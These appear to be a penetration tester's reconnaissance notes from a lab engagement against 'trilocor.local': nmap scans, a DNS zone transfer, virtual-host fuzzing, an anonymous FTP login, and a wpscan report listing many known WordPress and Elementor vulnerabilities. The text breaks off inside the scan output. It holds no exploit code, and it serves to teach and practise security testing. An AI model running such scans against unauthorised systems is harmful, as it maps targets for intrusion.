External Testing

nmap

```
$ nmap --open -oA nmap_1k trilocor.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 01:11 EST
Nmap scan report for trilocor.local (10.129.170.212)
Host is up (0.30s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
993/tcp  open  imaps
995/tcp  open  pop3s
7777/tcp open  cbt

Nmap done: 1 IP address (1 host up) scanned in 4.37 seconds
```
```
# Nmap 7.94SVN scan initiated Thu Jan 16 02:02:25 2025 as: /usr/lib/nmap/nmap --privileged --open -p- -A -oA nmap_all trilocor.local
Nmap scan report for trilocor.local (10.129.170.213)
Host is up (0.41s latency).
Not shown: 65524 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_  256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: WEB-NIX01, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp   open  domain   (unknown banner: ISC BIND 9 (Ubuntu Linux))
| dns-nsid: 
|_  bind.version: ISC BIND 9 (Ubuntu Linux)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    BIND 9 (Ubuntu Linux)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Trilocor – A cutting edge robotics company!
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.3
110/tcp  open  pop3     Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-08-03T08:24:29
|_Not valid after:  2032-07-31T08:24:29
|_pop3-capabilities: SASL STLS AUTH-RESP-CODE UIDL RESP-CODES CAPA PIPELINING TOP
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
143/tcp  open  imap     Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-08-03T08:24:29
|_Not valid after:  2032-07-31T08:24:29
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-08-03T08:24:29
|_Not valid after:  2032-07-31T08:24:29
995/tcp  open  ssl/pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-08-03T08:24:29
|_Not valid after:  2032-07-31T08:24:29
7777/tcp open  http     Werkzeug httpd 2.2.1 (Python 3.8.10)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/2.2.1 Python/3.8.10
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94SVN%I=7%D=1/16%Time=6788AF58%P=aarch64-unknown-linux-g
SF:nu%r(DNSVersionBindReqTCP,46,"\0D\0\x06\x85\0\0\x01\0\x01\0\0\0\0\x07ve
SF:rsion\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x1a\x19ISC\x2
SF:0BIND\x209\x20\(Ubuntu\x20Linux\)");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/16%OT=21%CT=1%CU=35304%PV=Y%DS=2%DC=T%G=Y%TM=6788
OS:AFE6%P=aarch64-unknown-linux-gnu)SEQ(TI=Z%CI=Z%II=I%TS=9)SEQ(SP=FE%GCD=1
OS:%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=FE%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS(
OS:O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11
OS:NW7%O6=M53AST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=N)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)T7(R=N)
OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: WEB-NIX01; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   524.50 ms 10.10.16.1
2   524.51 ms trilocor.local (10.129.170.213)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 16 02:06:14 2025 -- 1 IP address (1 host up) scanned in 229.28 seconds
```
Subdomain

```
trilocor.local
www.trilocor.local
blog.trilocor.local
careers.trilocor.local
dev.trilocor.local
portal.trilocor.local
pr.trilocor.local
remote.trilocor.local
store.trilocor.local
osticketapp.trilocor.local
```
dig

```
$ dig axfr trilocor.local @10.129.170.214

; <<>> DiG 9.20.4-2-Debian <<>> axfr trilocor.local @10.129.170.214
;; global options: +cmd
trilocor.local.         86400   IN      SOA     ns1.trilocor.local. dnsadmin.trilocor.local. 21 604800 86400 2419200 86400
trilocor.local.         86400   IN      NS      trilocor.local.
trilocor.local.         86400   IN      A       127.0.0.1
blog.trilocor.local.    86400   IN      A       127.0.0.1
careers.trilocor.local. 86400   IN      A       127.0.0.1
dev.trilocor.local.     86400   IN      A       127.0.0.1
portal.trilocor.local.  86400   IN      A       127.0.0.1
pr.trilocor.local.      86400   IN      A       127.0.0.1
remote.trilocor.local.  86400   IN      A       127.0.0.1
store.trilocor.local.   86400   IN      A       127.0.0.1
trilocor.local.         86400   IN      SOA     ns1.trilocor.local. dnsadmin.trilocor.local. 21 604800 86400 2419200 86400
;; Query time: 755 msec
;; SERVER: 10.129.170.214#53(10.129.170.214) (TCP)
;; WHEN: Thu Jan 16 02:21:38 EST 2025
;; XFR size: 11 records (messages 1, bytes 338)
```
ffuf

Virtual-host fuzzing against the web server, filtering out the two response sizes that every unknown Host header returns (0 and 251273 bytes), turns up one name the zone transfer did not list:

```
$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.129.162.21 -H 'Host:FUZZ.trilocor.local' -fs 0,251273

osticketapp.trilocor.local
```
Service Enumeration

SMB (all attempts failed)

FTP: anonymous login works, but the only file present is empty
```
$ ftp anonymous@trilocor.local
Connected to trilocor.local.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47474|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0               0 Sep 14  2022 Uninstaller.lnk
226 Directory send OK.
```
Web Enumeration

eyewitness

```
eyewitness -f subdomain -d eyewitness --timeout 120
```
…
wpscan
```
$ wpscan --url www.trilocor.local -e --api-token xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://www.trilocor.local/ [10.129.170.214]
[+] Started: Thu Jan 16 05:36:38 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 5.8.3 identified (Insecure, released on 2022-01-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://www.trilocor.local/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.3'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://www.trilocor.local/, Match: 'WordPress 5.8.3'
 |
 | [!] 33 vulnerabilities identified:
 |
 | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
 |     Fixed in: 5.8.4
 |     References:
 |      - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |
 | [!] Title: WordPress < 5.9.2 / Gutenberg < 12.7.2 - Prototype Pollution via Gutenberg’s wordpress/url package
 |     Fixed in: 5.8.4
 |     References:
 |      - https://wpscan.com/vulnerability/6e61b246-5af1-4a4f-9ca8-a8c87eb2e499
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |      - https://github.com/WordPress/gutenberg/pull/39365/files
 |
 | [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
 |     Fixed in: 5.8.5
 |     References:
 |      - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
 |     Fixed in: 5.8.5
 |     References:
 |      - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - SQLi via Link API
 |     Fixed in: 5.8.5
 |     References:
 |      - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283
 |
 | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
 |
 | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
 |
 | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc
 |
 | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955
 |
 | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
 |
 | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492
 |
 | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
 |
 | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/gutenberg/pull/45045/files
 |
 | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
 |     References:
 |      - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
 |      - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
 |
 | [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/
 |
 | [!] Title: WP < 6.2.1 - Contributor+ Content Injection
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
 |      - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
 |     Fixed in: 5.8.9
 |     References:
 |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
 |     Fixed in: 5.8.9
 |     References:
 |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
 |     Fixed in: 5.8.10
 |     References:
 |      - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
 |     Fixed in: 5.8.10
 |     References:
 |      - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
 |     Fixed in: 5.8.10
 |     References:
 |      - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/

[+] WordPress theme in use: astra
 | Location: http://www.trilocor.local/wp-content/themes/astra/
 | Latest Version: 4.8.10
 | Last Updated: 2025-01-07T00:00:00.000Z
 | Style URL: http://www.trilocor.local/wp-content/themes/astra/style.css
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Astra < 4.6.9 - Contributor+ Stored XSS
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpscan.com/vulnerability/62871f3a-c9a8-49bb-b67b-143af3caa986
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2347
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed914e67-4cf7-49b1-96be-ed8c604e6dce
 |
 | [!] Title: Astra < 4.6.5 - Editor+ Stored XSS via Theme Header/Footer
 |     Fixed in: 4.6.5
 |     References:
 |      - https://wpscan.com/vulnerability/30fd2612-91f6-4c1b-8d0c-fa607edf4717
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29768
 |      - https://patchstack.com/database/vulnerability/astra/wordpress-astra-theme-4-6-4-cross-site-scripting-xss-vulnerability
 |
 | The version could not be determined.

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] elementor
 | Location: http://www.trilocor.local/wp-content/plugins/elementor/
 | Last Updated: 2025-01-15T16:20:00.000Z
 | [!] The version is out of date, the latest version is 3.26.5
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 16 vulnerabilities identified:
 |
 | [!] Title: Elementor < 3.5.6 - DOM Reflected Cross-Site Scripting
 |     Fixed in: 3.5.6
 |     References:
 |      - https://wpscan.com/vulnerability/9758570b-4729-4eef-ad52-b6e922f536d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29455
 |      - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
 |
 | [!] Title: Elementor Website Builder < 3.12.2 - Admin+ SQLi
 |     Fixed in: 3.12.2
 |     References:
 |      - https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0329
 |
 | [!] Title: Elementor Website Builder < 3.13.2 - Missing Authorization
 |     Fixed in: 3.13.2
 |     Reference: https://wpscan.com/vulnerability/0b68091c-6a05-4f81-a718-6ec139df2e96
 |
 | [!] Title: Elementor < 3.5.5 - Iframe Injection
 |     Fixed in: 3.5.5
 |     References:
 |      - https://wpscan.com/vulnerability/8273357e-f9e1-44bc-8082-8faab838eda7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4953
 |      - https://github.com/elementor/elementor/commit/292fc49e0f979bd52d838f0326d1faaebfa59f5e
 |
 | [!] Title: Elementor Website Builder < 3.16.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via get_inline_svg()
 |     Fixed in: 3.16.5
 |     References:
 |      - https://wpscan.com/vulnerability/62b53acf-6551-4ea7-8727-039a3c9ba7ce
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47505
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/b44ef21f-464e-487a-ba5a-fe889e4c488c
 |
 | [!] Title: Elementor Website Builder < 3.16.5 - Missing Authorization to Arbitrary Attachment Read
 |     Fixed in: 3.16.5
 |     References:
 |      - https://wpscan.com/vulnerability/e60f0f7e-4c3b-4107-803a-8e03526859ed
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47504
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/c873c76a-144e-4945-8fa2-c9ffe0e3c061
 |
 | [!] Title: Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import
 |     Fixed in: 3.18.2
 |     References:
 |      - https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48777
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b6d0a38-ac28-41c9-9da1-b30b3657b463
 |
 | [!] Title: Elementor < 3.19.1 - Authenticated(Contributor+) Arbitrary File Deletion and PHAR Deserialization
 |     Fixed in: 3.19.1
 |     References:
 |      - https://wpscan.com/vulnerability/4d7dfcc6-8c32-4e0d-b3bb-7e2685916e2b
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24934
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4915b769-9499-40ac-835e-279e3a910558
 |
 | [!] Title: Elementor Website Builder – More than Just a Page Builder < 3.19.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via get_image_alt
 |     Fixed in: 3.19.0
 |     References:
 |      - https://wpscan.com/vulnerability/57af46d9-9a26-4085-9829-e0add7893332
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0506
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332
 |
 | [!] Title: Elementor Website Builder < 3.20.3 - Contributor+ DOM Stored XSS
 |     Fixed in: 3.20.3
 |     References:
 |      - https://wpscan.com/vulnerability/22e8d017-79f5-40c8-8a2c-e0ee42ba80c8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2117
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8d7448a-b8a6-4b0b-92df-a15272fc56bf
 |
 | [!] Title: Elementor Website Builder < 3.21.6 - Contributor+ DOM Stored XSS
 |     Fixed in: 3.21.6
 |     References:
 |      - https://wpscan.com/vulnerability/8b8f30d6-bd11-4155-bfd2-3ac15248382b
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4619
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/c7e1028e-e04b-46c4-b574-889d9fc1069d
 |
 | [!] Title: Elementor Website Builder < 3.22.2 - Contributor+ Arbitrary SVG Download
 |     Fixed in: 3.22.2
 |     References:
 |      - https://wpscan.com/vulnerability/e6d56be1-9a2a-426f-88ca-1ffa773622c1
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37437
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/f11bc707-2465-4b64-945a-c0db6e9043dd
 |
 | [!] Title: Elementor Website Builder – More than Just a Page Builder < 3.24.0 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets
 |     Fixed in: 3.24.0
 |     References:
 |      - https://wpscan.com/vulnerability/5200943b-5e07-4342-a090-f78435e30d30
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5416
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5
 |
 | [!] Title: Elementor < 3.24.6 - Contributor+ Information Exposure via get_image_alt
 |     Fixed in: 3.24.6
 |     References:
 |      - https://wpscan.com/vulnerability/dce5ad0c-3ce9-498f-b0f7-8dfd6ee82e40
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6757
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/96fa9ed7-6c13-4356-8a25-8a309be2b0e9
 |
 | [!] Title: Elementor Website Builder < 3.25.8 - Contributor+ Stored XSS
 |     Fixed in: 3.25.8
 |     References:
 |      - https://wpscan.com/vulnerability/78f0847b-3f59-43cf-87db-2cadda862aa3
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8236
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1305be5-8267-475f-b962-62e3930116e1
 |
 | [!] Title: Elementor Website Builder < 3.25.10 - Contributor+ Stored XSS via Typography Settings
 |     Fixed in: 3.25.10
 |     References:
 |      - https://wpscan.com/vulnerability/2e05843d-1797-4da9-99ec-06376484fb32
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10453
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/f23604b7-5a7f-4be7-bc73-cb4facdd1e73
 |
 | Version: 3.5.3 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://www.trilocor.local/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.5.3
 | Confirmed By:
 |  Javascript Comment (Aggressive Detection)
 |   - http://www.trilocor.local/wp-content/plugins/elementor/assets/js/admin-feedback.js, Match: 'elementor - v3.5.3'
 |  Style Comment (Aggressive Detection)
